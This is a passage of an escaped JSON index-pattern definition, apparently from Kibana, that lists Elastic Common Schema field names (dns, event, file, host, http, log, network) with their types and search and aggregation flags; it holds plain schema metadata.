"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.resolved_ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.response_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"error.stack_trace\"}}},{\"count\":0,\"name\":\"error.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.ingested\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.accessed\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.attributes\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.ctime\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.device\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.drive_letter\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.extension\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.gid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.group\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.inode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mime_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mtime\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.owner\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path\"}}},{\"count\":0,\"name\":\"file.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.target_path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.target_path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.target_path\"}}},{\"count\":0,\"name\":\"file.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.uid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.full\"}}},{\"count\":0,\"name\":\"host.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.name\"}}},{\"count\":0,\"name\":\"host.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.user.full_name\"}}},{\"count\":0,\"name\":\"host.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.user.name\"}}},{\"count\":0,\"name\":\"http.request.body.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.body.content\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.body.content.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"http.request.body.content\"}}},{\"count\":0,\"name\":\"http.request.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.method\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.referrer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.content\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.content.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"http.response.body.content\"}}},{\"count\":0,\"name\":\"http.response.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.status_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.level\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.logger\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.line\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.function\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"log.syslog.facility.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.priority\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"network.application\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.community_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.direction\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.forwarded_ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.iana_number\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.inner.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.inner.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripte